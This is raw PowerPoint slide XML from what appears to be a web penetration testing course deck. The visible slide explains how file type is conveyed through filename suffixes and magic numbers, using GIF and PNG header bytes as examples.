            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="190" name="Google Shape;190;p8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279" y="-109754"/>
            <a:ext cx="2049770" cy="79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3446" y="1337217"/>
            <a:ext cx="3689186" cy="302004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2824888" y="0"/>
            <a:ext cx="34942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 methods of conveying document type</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="197" name="Google Shape;197;p9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="476841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5A050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80488" y="812103"/>
            <a:ext cx="4491511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MIME types are not the only way to convey document type information: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Filename suffixes are sometimes used, especially on Microsoft Windows. Not all operating systems consider these suffixes meaningful (such as Linux and macOS), and there is no guarantee they are correct</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" marR="0" lvl="0" indent="-95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Magic numbers.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syntax of different formats allows file-type inference by looking at their byte structure. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" marR="0" lvl="0" indent="-95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example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="3659C2"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>GIF files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start with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="3659C2"/>
                </a:solidFill>
                <a:latin typeface="Merriweather"/>
                <a:ea typeface="Merriweather"/>
                <a:cs typeface="Merriweather"/>
                <a:sym typeface="Merriweather"/>
              </a:rPr>
              <a:t>47 49 46 38 39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hexadecimal value (GIF89), and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none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PNG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files with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none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89 50 4E 47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(.PNG).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Not all file types have magic numbers, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="C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this is not 100% reliable either.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="200" name="Google Shape;200;p9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5057942" y="1202529"/>
            <a:ext cx="3463437" cy="30051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On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>134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Montserrat Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Merriweather</vt:lpstr>
      <vt:lpstr>Poppins</vt:lpstr>
      <vt:lpstr>Volsce template</vt:lpstr>
      <vt:lpstr>Web Penetration Testing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Penetration Testing 2</dc:title>
  <dc:creator>HP-USER</dc:creator>
  <cp:lastModifiedBy>PC</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-20T12:42:33Z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0x010100CB420F600323F34EA568CBDFED2C7519</vt:lpwstr>
  </property>
</Properties>
</file>